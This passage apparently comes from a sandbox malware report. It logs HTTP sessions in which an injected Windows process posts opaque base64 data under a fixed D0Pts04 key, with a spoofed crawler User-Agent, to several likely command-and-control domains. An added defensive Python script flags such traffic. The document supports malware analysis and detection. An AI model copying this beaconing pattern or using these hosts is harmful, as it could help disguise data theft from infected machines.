                                                          32 | 192.168.2.6 | 49755 | 188.114.96.3 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:04:46.484648943 CEST | 469 | OUT | GET /fwdd/?D0Pts04=K/pqHoAOWNF4P+w85wWHM/iowpzI4zdOarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTM8AeJPJZyoLpuu1Q/5znf4Q/4KQ0LClPCb/j5/YCrPSLvGMpclo=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.evoolihubs.shop
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:04:46.941668034 CEST | 998 | IN | HTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 12 Jul 2024 22:04:46 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 167
                                                          Connection: close
                                                          Cache-Control: max-age=3600
                                                          Expires: Fri, 12 Jul 2024 23:04:46 GMT
                                                          Location: https://www.evoolihubs.shop/fwdd/?D0Pts04=K/pqHoAOWNF4P+w85wWHM/iowpzI4zdOarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTM8AeJPJZyoLpuu1Q/5znf4Q/4KQ0LClPCb/j5/YCrPSLvGMpclo=&Q8s=tdcd5h7ptjmdxx
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C2StsB6JwFYp%2BF%2F8CwbVIo4h%2FhD3E4BHrq%2Bc7kX9w%2F1%2FzjCQeEwoqani0%2Fj6yZpmu8LB76fEH49TIBMztczHCH4R48XYUrnt1nLYT4%2F2e9yQyIMvXPagjOvs9I82qjw30mWhVK9i"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8a2454b90d2b1a30-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
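The sessions above all have the same shape regardless of which domain is contacted: the injected process sends a search-engine crawler User-Agent (Yahoo! Slurp), a POST whose body is a single short key (D0Pts04) carrying an opaque base64-like value, Origin and Referer headers that simply mirror the target, and the same key later reappears in a GET query string. The following Python script is an added example and is not part of the Joe Sandbox report or of the sample; it parses request records of that shape and scores them on exactly those properties, so a practitioner can run the same triage over their own proxy or sandbox export. Host names, paths and the parameter name are taken from the sessions on this page; the request bodies are abbreviated placeholders, the fourth record is a constructed benign control, and the crawler list and size thresholds are assumptions chosen for illustration.

```python
"""Heuristic triage of HTTP sessions of the shape shown in the sandbox report.

Added example (not the report's or the sample's own code).  It works on
simple request dictionaries so it runs offline; a real deployment would
build these from a PCAP or the sandbox's HTTP export.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Assumption: any well-known crawler UA coming from a local client process is
# anomalous.  The list is illustrative, not exhaustive.
CRAWLER_UA_MARKERS = ("Yahoo! Slurp", "Googlebot", "bingbot")
# Assumption: a short alphanumeric key with a long base64-like value is "opaque".
SHORT_KEY = re.compile(r"^[A-Za-z0-9]{4,12}$")
OPAQUE_VALUE = re.compile(r"^[A-Za-z0-9+/]{100,}={0,2}$")

SLURP_UA = "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

# Constructed sample records, abbreviated from the sessions above.  Bodies and
# queries are placeholders of realistic length; only their shape matters here.
SAMPLE_REQUESTS = [
    {"host": "www.mcpcrecycling.com", "method": "GET",
     "path": "/22y6/?D0Pts04=" + "A" * 120 + "&Q8s=tdcd5h7ptjmdxx",
     "headers": {"User-Agent": SLURP_UA}, "body": ""},
    {"host": "www.evoolihubs.shop", "method": "POST", "path": "/fwdd/",
     "headers": {"User-Agent": SLURP_UA, "Origin": "http://www.evoolihubs.shop",
                 "Referer": "http://www.evoolihubs.shop/fwdd/",
                 "Content-Type": "application/x-www-form-urlencoded"},
     "body": "D0Pts04=" + "B" * 200 + "=="},
    {"host": "www.shaf-kupe-msk.store", "method": "POST", "path": "/8rqd/",
     "headers": {"User-Agent": SLURP_UA, "Origin": "http://www.shaf-kupe-msk.store",
                 "Referer": "http://www.shaf-kupe-msk.store/8rqd/",
                 "Content-Type": "application/x-www-form-urlencoded"},
     "body": "D0Pts04=" + "C" * 200},
    # Benign control (constructed): an ordinary browser form post to one host.
    {"host": "shop.example", "method": "POST", "path": "/cart",
     "headers": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/127.0",
                 "Origin": "https://shop.example",
                 "Content-Type": "application/x-www-form-urlencoded"},
     "body": "item=42&qty=1"},
]


def form_params(req):
    """Key/value pairs of the request: query string for GET, body for POST.

    Values are deliberately left undecoded: '+' and '/' are base64 symbols in
    this traffic, and urllib's decoder would turn '+' into a space."""
    raw = urlparse(req["path"]).query if req["method"] == "GET" else req["body"]
    params = {}
    for pair in filter(None, raw.split("&")):
        key, _, value = pair.partition("=")
        params[key] = value
    return params


def request_indicators(req):
    """Names of the weak indicators one request shows; together they form the pattern."""
    hits = []
    if any(m in req["headers"].get("User-Agent", "") for m in CRAWLER_UA_MARKERS):
        hits.append("crawler_ua")
    if any(SHORT_KEY.match(k) and OPAQUE_VALUE.match(v) for k, v in form_params(req).items()):
        hits.append("opaque_param")
    if req["method"] == "POST":
        origin = req["headers"].get("Origin", "")
        referer = req["headers"].get("Referer", "")
        # A real browser sets Origin/Referer to the page that issued the form,
        # here they only echo the destination host and path.
        if origin == f"http://{req['host']}" and referer == origin + req["path"]:
            hits.append("self_referencing_origin")
    return hits


def shared_param_hosts(requests):
    """Map each opaque parameter name to the hosts it was sent to, keeping only
    names seen at two or more hosts: one payload key reused across unrelated
    domains ties those contacts together as a single beaconing client."""
    by_key = defaultdict(set)
    for req in requests:
        for key, value in form_params(req).items():
            if SHORT_KEY.match(key) and OPAQUE_VALUE.match(value):
                by_key[key].add(req["host"])
    return {k: hosts for k, hosts in by_key.items() if len(hosts) >= 2}


def triage(requests, min_indicators=2):
    """Hosts worth blocking or investigating: any host with at least
    min_indicators on one request, plus every host sharing an opaque key."""
    flagged = {r["host"] for r in requests if len(request_indicators(r)) >= min_indicators}
    for hosts in shared_param_hosts(requests).values():
        flagged |= hosts
    return sorted(flagged)


if __name__ == "__main__":
    for r in SAMPLE_REQUESTS:
        print(f"{r['method']:4} {r['host']:28} {request_indicators(r)}")
    print("shared keys:", shared_param_hosts(SAMPLE_REQUESTS))
    print("flagged hosts:", triage(SAMPLE_REQUESTS))
```

The per-request indicators are each explainable on their own (a crawler UA, a long form value, a same-site form), which is why the script only acts on two of them together or on the cross-host reuse of the parameter name; that reuse is the one property a defender can pivot on when the contacted domains themselves are new.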


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          33 | 192.168.2.6 | 49756 | 45.130.41.38 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:04:52.320529938 CEST | 740 | OUT | POST /8rqd/ HTTP/1.1
                                                          Host: www.shaf-kupe-msk.store
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.shaf-kupe-msk.store
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.shaf-kupe-msk.store/8rqd/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 77 71 78 66 78 4a 37 32 45 35 56 5a 5a 46 45 45 69 6f 77 61 54 69 67 39 71 2b 69 4e 56 32 5a 73 39 55 64 38 39 48 30 61 78 58 65 52 69 7a 7a 74 4d 46 33 6c 74 44 41 55 68 62 75 73 32 59 63 33 70 2b 36 6d 7a 59 34 6f 54 63 6f 46 6b 6a 6d 50 66 6c 64 48 72 77 30 71 77 69 55 2f 66 78 43 53 46 7a 42 65 43 4e 75 4a 52 2f 63 6d 48 7a 72 52 34 37 32 6b 62 36 48 42 52 62 66 4a 6e 79 33 45 37 44 31 69 50 6b 72 36 73 5a 30 70 72 70 79 6d 57 71 52 4d 50 69 52 33 6d 7a 31 55 48 4e 2b 6b 54 77 31 4f 70 55 61 35 44 4e 46 48 4e 30 4e 6d 6c 44 58 6c 79 54 67 65 61 31 65 4a 48 6e 2b 56 2f 6c 59 4a 7a 31 30 72 75 66 71 53
                                                          Data Ascii: D0Pts04=wqxfxJ72E5VZZFEEiowaTig9q+iNV2Zs9Ud89H0axXeRizztMF3ltDAUhbus2Yc3p+6mzY4oTcoFkjmPfldHrw0qwiU/fxCSFzBeCNuJR/cmHzrR472kb6HBRbfJny3E7D1iPkr6sZ0prpymWqRMPiR3mz1UHN+kTw1OpUa5DNFHN0NmlDXlyTgea1eJHn+V/lYJz10rufqS
                                                          Jul 13, 2024 00:04:53.028438091 CEST | 483 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx-reuseport/1.21.1
                                                          Date: Fri, 12 Jul 2024 22:04:52 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip
                                                          Data Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 4e c3 30 10 44 ef f9 8a a5 27 38 c4 1b aa 54 e2 60 59 82 26 15 95 42 89 8a 73 e0 68 f0 56 8e da c6 c1 76 08 fc 3d 4e aa 4a 5c 56 9a dd b7 a3 19 7e 53 bc ae e5 7b 5d c2 b3 7c a9 a0 6e 9e aa ed 1a 16 29 e2 b6 94 1b c4 42 16 97 cb 92 65 88 e5 6e 21 12 6e c2 f9 24 b8 21 a5 a3 08 6d 38 91 c8 b3 1c 76 36 c0 c6 0e 9d e6 78 59 26 1c 67 88 7f 58 fd 3b fd dd 8b 7f 4c 54 09 ef 85 34 04 8e be 06 f2 81 34 34 fb 0a 46 e5 a1 8b dc 61 e2 c0 76 10 4c eb c1 93 fb 26 c7 38 f6 93 93 8b 43 69 ed c8 7b f1 d8 ab 4f 43 b8 64 39 5b ad e0 b6 e9 da 9f 3b 78 9b 71 50 01 c6 71 64 de a8 43 7a 1c 7a 4a cf fe c8 7c b0 8e a0 b6 2e c0 43 c6 f1 ea 13 e3 ce 41 63 b4 a9 60 f2 07 ab 25 45 b8 1b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: (gzip-compressed chunked body; the printable rendering is not meaningful, decompress the Data Raw bytes above to recover the 404 page)


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          34 | 192.168.2.6 | 49757 | 45.130.41.38 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:04:54.858742952 CEST | 764 | OUT | POST /8rqd/ HTTP/1.1
                                                          Host: www.shaf-kupe-msk.store
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.shaf-kupe-msk.store
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.shaf-kupe-msk.store/8rqd/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 77 71 78 66 78 4a 37 32 45 35 56 5a 5a 67 4d 45 67 49 4d 61 53 43 67 2b 6c 65 69 4e 62 57 5a 6f 39 55 52 38 39 43 4d 77 77 68 6d 52 68 57 50 74 65 55 33 6c 71 44 41 55 31 4c 76 6e 34 34 64 37 70 2b 32 66 7a 61 38 6f 54 63 55 46 6b 68 75 50 66 55 64 45 72 67 30 30 34 43 55 75 41 42 43 53 46 7a 42 65 43 4e 71 77 52 38 73 6d 47 47 6a 52 33 36 32 6e 46 71 48 43 59 37 66 4a 6a 79 32 44 37 44 31 55 50 6c 33 63 73 61 4d 70 72 70 43 6d 58 37 52 50 45 69 52 39 6f 54 31 43 4a 74 7a 62 56 78 51 30 32 6c 61 44 63 65 56 73 49 43 4d 38 35 77 58 47 67 44 41 63 61 33 47 37 48 48 2b 2f 39 6c 67 4a 68 69 34 4d 68 72 50 78 68 31 77 53 46 6c 36 7a 78 5a 42 55 4e 6c 4f 48 35 79 4c 45 75 41 3d 3d
                                                          Data Ascii: D0Pts04=wqxfxJ72E5VZZgMEgIMaSCg+leiNbWZo9UR89CMwwhmRhWPteU3lqDAU1Lvn44d7p+2fza8oTcUFkhuPfUdErg004CUuABCSFzBeCNqwR8smGGjR362nFqHCY7fJjy2D7D1UPl3csaMprpCmX7RPEiR9oT1CJtzbVxQ02laDceVsICM85wXGgDAca3G7HH+/9lgJhi4MhrPxh1wSFl6zxZBUNlOH5yLEuA==
                                                          Jul 13, 2024 00:04:55.566567898 CEST | 483 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx-reuseport/1.21.1
                                                          Date: Fri, 12 Jul 2024 22:04:55 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip
                                                          Data Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 4e c3 30 10 44 ef f9 8a a5 27 38 c4 1b aa 54 e2 60 59 82 26 15 95 42 89 8a 73 e0 68 f0 56 8e da c6 c1 76 08 fc 3d 4e aa 4a 5c 56 9a dd b7 a3 19 7e 53 bc ae e5 7b 5d c2 b3 7c a9 a0 6e 9e aa ed 1a 16 29 e2 b6 94 1b c4 42 16 97 cb 92 65 88 e5 6e 21 12 6e c2 f9 24 b8 21 a5 a3 08 6d 38 91 c8 b3 1c 76 36 c0 c6 0e 9d e6 78 59 26 1c 67 88 7f 58 fd 3b fd dd 8b 7f 4c 54 09 ef 85 34 04 8e be 06 f2 81 34 34 fb 0a 46 e5 a1 8b dc 61 e2 c0 76 10 4c eb c1 93 fb 26 c7 38 f6 93 93 8b 43 69 ed c8 7b f1 d8 ab 4f 43 b8 64 39 5b ad e0 b6 e9 da 9f 3b 78 9b 71 50 01 c6 71 64 de a8 43 7a 1c 7a 4a cf fe c8 7c b0 8e a0 b6 2e c0 43 c6 f1 ea 13 e3 ce 41 63 b4 a9 60 f2 07 ab 25 45 b8 1b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: (gzip-compressed chunked body; the printable rendering is not meaningful, decompress the Data Raw bytes above to recover the 404 page)


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          35 | 192.168.2.6 | 49758 | 45.130.41.38 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:04:57.390508890 CEST | 1777 | OUT | POST /8rqd/ HTTP/1.1
                                                          Host: www.shaf-kupe-msk.store
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.shaf-kupe-msk.store
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.shaf-kupe-msk.store/8rqd/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 77 71 78 66 78 4a 37 32 45 35 56 5a 5a 67 4d 45 67 49 4d 61 53 43 67 2b 6c 65 69 4e 62 57 5a 6f 39 55 52 38 39 43 4d 77 77 68 75 52 68 6a 44 74 4d 6e 76 6c 72 44 41 55 32 4c 75 67 34 34 63 68 70 36 62 58 7a 61 67 53 54 5a 59 46 6b 44 57 50 4f 78 39 45 79 51 30 30 30 69 56 70 66 78 43 44 46 7a 78 61 43 4e 61 77 52 38 73 6d 47 48 54 52 2b 4c 32 6e 43 61 48 42 52 62 65 62 6e 79 32 6e 37 44 74 71 50 6c 7a 71 73 71 73 70 72 4a 53 6d 62 74 74 50 4a 69 52 7a 6c 7a 30 42 4a 74 2f 36 56 78 63 43 32 6c 75 6c 63 63 4a 73 4a 69 49 69 71 44 62 39 30 77 63 64 61 48 66 5a 4c 48 76 42 6c 6b 41 55 6f 7a 67 38 2f 35 6a 4b 75 31 31 4e 44 30 6a 75 37 71 74 56 45 6a 54 6e 77 7a 66 49 74 74 2f 6b 2f 6e 69 71 42 64 61 61 79 4e 63 4c 70 44 32 64 56 31 69 71 31 2f 2f 69 2b 33 74 39 73 6c 67 50 66 4c 52 75 6a 66 5a 6b 44 34 4f 38 2f 38 34 4a 4a 69 50 6c 55 73 30 6a 6d 56 63 66 66 67 61 58 51 4a 50 64 56 51 70 4f 43 2b 4c 46 78 66 2f 66 33 63 56 62 4a 6a 61 4c 2b 4e 37 34 6c 36 37 78 6c 6e 2b 52 58 76 [TRUNCATED]
                                                          Data Ascii: D0Pts04=wqxfxJ72E5VZZgMEgIMaSCg+leiNbWZo9UR89CMwwhuRhjDtMnvlrDAU2Lug44chp6bXzagSTZYFkDWPOx9EyQ000iVpfxCDFzxaCNawR8smGHTR+L2nCaHBRbebny2n7DtqPlzqsqsprJSmbttPJiRzlz0BJt/6VxcC2lulccJsJiIiqDb90wcdaHfZLHvBlkAUozg8/5jKu11ND0ju7qtVEjTnwzfItt/k/niqBdaayNcLpD2dV1iq1//i+3t9slgPfLRujfZkD4O8/84JJiPlUs0jmVcffgaXQJPdVQpOC+LFxf/f3cVbJjaL+N74l67xln+RXvKXa4h/tWEIcdvodnc0eyQdhi877CkiL052NMw5wOIl8pDsRtvdDFvQ4ipLJ6TFkcpdD6gAAEp9dz/1S8KxE87w8bVW/l/yviyzR4qtuu7cGzBt4prlh+/Yz4gGPMx36DnZwJeEKLlxO5L/H9Cb7e1xZWysqjXrUQFnGtmms7qr1HkoFlLe7LYEtIvqXCihTF34m+qTdG37KJoK/X84frjUIDR85rlnTP2EChhZ7wRcW62dsgkxyetOSXPFuU9pCPwcSpctD8yv6LR31g72PW8HkzhrTS4xdmYU45YNrX9M4wpzCspwiPcBxIya9xrCgviueS1DANSBaNO48ldt0gSjsv8ICfh4R2/3XKg6fWxovrBWf7NFKmA9XaBubc4UY/oJAPVCmupxRrsiOFOLsFTMYjXvesZY5Lj5CnfJeRv3Z4nMb8QDp/bDbjS97I561oZpTnggjIWAgXF5OTxKT/M3ABR+OyvXOeUBh8xEsDZEtzio2Y+zroBbDp+iT3Rcf8TL8CV9LohTu6IR4TgZjNqlA6i9XHh4OHztyG2jpAUzmKZOUKot4PJbhapXhsuIW4y20WlEwJmIjA/kaK1KhCZ1/ZKRpuok9XAf2ycWg2rJiSUO4tSLzIU9y0pea3O20vjTaHstN0Dsyukj8yqNiiqTNdJmghldrY+4 [TRUNCATED]
                                                          Timestamp: Jul 13, 2024 00:04:58.235800982 CEST | Bytes transferred: 483 | Direction: IN
                                                          HTTP/1.1 404 Not Found
                                                          Server: nginx-reuseport/1.21.1
                                                          Date: Fri, 12 Jul 2024 22:04:58 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip
                                                          Data Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 4e c3 30 10 44 ef f9 8a a5 27 38 c4 1b aa 54 e2 60 59 82 26 15 95 42 89 8a 73 e0 68 f0 56 8e da c6 c1 76 08 fc 3d 4e aa 4a 5c 56 9a dd b7 a3 19 7e 53 bc ae e5 7b 5d c2 b3 7c a9 a0 6e 9e aa ed 1a 16 29 e2 b6 94 1b c4 42 16 97 cb 92 65 88 e5 6e 21 12 6e c2 f9 24 b8 21 a5 a3 08 6d 38 91 c8 b3 1c 76 36 c0 c6 0e 9d e6 78 59 26 1c 67 88 7f 58 fd 3b fd dd 8b 7f 4c 54 09 ef 85 34 04 8e be 06 f2 81 34 34 fb 0a 46 e5 a1 8b dc 61 e2 c0 76 10 4c eb c1 93 fb 26 c7 38 f6 93 93 8b 43 69 ed c8 7b f1 d8 ab 4f 43 b8 64 39 5b ad e0 b6 e9 da 9f 3b 78 9b 71 50 01 c6 71 64 de a8 43 7a 1c 7a 4a cf fe c8 7c b0 8e a0 b6 2e c0 43 c6 f1 ea 13 e3 ce 41 63 b4 a9 60 f2 07 ab 25 45 b8 1b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: eeMN0D'8T`Y&BshVv=NJ\V~S{]|n)Ben!n$!m8v6xY&gX;LT444FavL&8Ci{OCd9[;xqPqdCzzJ|.CAc`%E0


                                                          Session ID: 36 | Source IP: 192.168.2.6 | Source Port: 49759 | Destination IP: 45.130.41.38 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp: Jul 13, 2024 00:05:00.043647051 CEST | Bytes transferred: 473 | Direction: OUT
                                                          GET /8rqd/?D0Pts04=9oZ/y9WNG6tRMVJyjLEcdS0HrpeSaX9AmXAuzSAQ4FjvmAKqYk+BgRtg4p2v1sV9pfbK4NMIa5tejy6Eex1rgQRDwh5vDRupVU05UePYOPUqHSHA96iOT4nNXuXT/C+t5WN5HjI=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.shaf-kupe-msk.store
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Timestamp: Jul 13, 2024 00:05:00.780504942 CEST | Bytes transferred: 486 | Direction: IN
                                                          HTTP/1.1 404 Not Found
                                                          Server: nginx-reuseport/1.21.1
                                                          Date: Fri, 12 Jul 2024 22:05:00 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 283
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 68 61 66 2d 6b 75 70 65 2d 6d 73 6b 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.shaf-kupe-msk.store Port 80</address></body></html>


                                                          Session ID: 37 | Source IP: 192.168.2.6 | Source Port: 49760 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp: Jul 13, 2024 00:05:06.023060083 CEST | Bytes transferred: 731 | Direction: OUT
                                                          POST /ch4t/ HTTP/1.1
                                                          Host: www.quixaclienti.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.quixaclienti.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.quixaclienti.com/ch4t/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 2b 58 51 4a 76 39 58 45 73 7a 4b 37 54 72 33 56 64 38 5a 61 30 61 69 64 34 72 30 32 48 4d 53 48 6b 51 71 34 51 7a 71 48 62 4b 39 67 70 4d 58 75 45 2b 44 56 31 4e 71 78 64 62 2f 79 67 4c 4c 38 43 76 42 54 42 59 46 74 2b 76 50 34 66 2f 75 37 30 70 67 31 43 42 48 69 77 56 33 73 34 6e 61 34 63 44 56 53 6c 39 57 70 67 74 64 44 50 77 41 53 51 57 42 6a 46 30 5a 61 56 57 38 6d 6e 6f 57 58 4a 48 35 4a 6d 44 45 63 68 6d 52 73 73 2f 44 32 4c 2f 69 66 31 74 6b 56 61 70 50 56 6d 58 42 6e 6a 58 41 49 36 52 45 50 74 65 2f 61 47 65 79 65 32 56 35 68 49 6d 66 4f 33 6f 58 51 56 62 6d 5a 2b 69 4d 70 79 53 44 35 54 34 55 44
                                                          Data Ascii: D0Pts04=+XQJv9XEszK7Tr3Vd8Za0aid4r02HMSHkQq4QzqHbK9gpMXuE+DV1Nqxdb/ygLL8CvBTBYFt+vP4f/u70pg1CBHiwV3s4na4cDVSl9WpgtdDPwASQWBjF0ZaVW8mnoWXJH5JmDEchmRss/D2L/if1tkVapPVmXBnjXAI6REPte/aGeye2V5hImfO3oXQVbmZ+iMpySD5T4UD


                                                          Session ID: 38 | Source IP: 192.168.2.6 | Source Port: 49761 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp: Jul 13, 2024 00:05:08.562772036 CEST | Bytes transferred: 755 | Direction: OUT
                                                          POST /ch4t/ HTTP/1.1
                                                          Host: www.quixaclienti.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.quixaclienti.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.quixaclienti.com/ch4t/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
